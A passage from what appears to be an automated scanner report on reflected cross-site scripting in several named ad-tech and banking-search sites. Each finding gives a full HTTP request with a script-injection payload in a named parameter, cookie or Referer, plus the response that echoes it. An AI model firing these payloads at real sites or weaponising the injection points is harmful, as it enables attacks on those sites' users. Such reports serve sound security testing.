P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 03-Feb-2011 19:02:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 368

document.write('<img width="0" height="0" src="http://tag.admeld.com/match346ad';alert(1)//f0a82ea655a?admeld_adprovider_id=300&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1297191762&custom_user_segments=%2C3391%2C13746%2C3392%2C23864%2C11262%2C11265%2C30353%2C7775%2C17277%2C3425%2
...[SNIP]...

4.424. http://pluck.local.com/ver1.0/daapi2.api [jpcb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.local.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload d5e7e<script>alert(1)</script>1fda4ce402e was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcbd5e7e<script>alert(1)</script>1fda4ce402e&jpctx=request_0 HTTP/1.1
Host: pluck.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Thu, 03 Feb 2011 16:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Date: Thu, 03 Feb 2011 16:08:27 GMT
Content-Length: 91

PluckSDKjpcbd5e7e<script>alert(1)</script>1fda4ce402e({
"Envelopes": []
},'request_0');

4.425. http://pluck.local.com/ver1.0/daapi2.api [jpctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.local.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload fa896<script>alert(1)</script>11222906e44 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0fa896<script>alert(1)</script>11222906e44 HTTP/1.1
Host: pluck.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Thu, 03 Feb 2011 16:08:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Date: Thu, 03 Feb 2011 16:08:45 GMT
Content-Length: 91

PluckSDKjpcb({
"Envelopes": []
},'request_0fa896<script>alert(1)</script>11222906e44');

4.426. http://pluckit.demandmedia.com/requests [apiKey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the apiKey request parameter is copied into the HTML document as plain text between tags. The payload 3767e<script>alert(1)</script>480207bdcb8 was submitted in the apiKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 920
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:22 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:22 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\":0,\"requestedBy\":\"\",\"message\":\"Unknown customer: c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8\",\"id\":\"4744580d-ffc5-418f-8c03-776a210129be\"}"},{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\"
...[SNIP]...

4.427. http://pluckit.demandmedia.com/requests [jsonpCallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpCallback request parameter is copied into the HTML document as plain text between tags. The payload 546ff<script>alert(1)</script>aa268e625b5 was submitted in the jsonpCallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4368
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:26 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:25 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Customers.GetCustomerResponse","payload":"{\"objectType\":\"Customers.GetCustomerResponse\",\"isError\":false,\"TTL\":0,\"requestedBy
...[SNIP]...

4.428. http://pluckit.demandmedia.com/requests [jsonpContext parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpContext request parameter is copied into the HTML document as plain text between tags. The payload 6b2fe<script>alert(1)</script>7d41626bf96 was submitted in the jsonpContext parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_4423813743186b2fe<script>alert(1)</script>7d41626bf96&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4388
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:28 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Customers.GetCustomerResponse","payload":"{\"objectType\":\"Custo
...[SNIP]...
11a033338c2&t=' + trEscae8b1b2cb1(document.title) + '&r=' + trEscae8b1b2cb1(document.referrer);\r\n})();\r\n//]]>\r\n","ContentTrackingSrc":"","diagnostics":null,"requestedBy":""},'request_4423813743186b2fe<script>alert(1)</script>7d41626bf96');

4.429. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6506f"><script>alert(1)</script>91c27bc8e67 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6506f"><script>alert(1)</script>91c27bc8e67&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=8310709099384096523&fpid=6506f"><script>alert(1)</script>91c27bc8e67&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.430. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38030"><script>alert(1)</script>3e8a29e1991 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=38030"><script>alert(1)</script>3e8a29e1991&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2664611420216086048&fpid=4&nu=n&t=&sp=38030"><script>alert(1)</script>3e8a29e1991&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /selfservice/microsites/wachoviaSearchEntry.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef9"><script>alert(1)</script>6d3f3e1bc4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selfservice/microsites/wachoviaSearchEntry.do?aaef9"><script>alert(1)</script>6d3f3e1bc4b=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E2F343A11D72B8481BC40D2D653F4B5; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Thu, 03 Feb 2011 13:17:41 GMT
Connection: close


<html>
   
   <head>
       <title>KNOVA
   Search Results
</title>
       <meta http-equiv="content-type" content="text/html;c
...[SNIP]...
<TextArea name="aaef9"><script>alert(1)</script>6d3f3e1bc4b" style="display:none;visibility:hide">
...[SNIP]...

4.432. http://smm.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85494'%3balert(1)//dbe71432c4e was submitted in the h parameter. This input was echoed as 85494';alert(1)//dbe71432c4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4&w=300&h=25085494'%3balert(1)//dbe71432c4e&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:48 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25085494';alert(1)//dbe71432c4e" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.433. http://smm.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed62"%3balert(1)//eec28b3a643 was submitted in the pid parameter. This input was echoed as aed62";alert(1)//eec28b3a643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4aed62"%3balert(1)//eec28b3a643&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

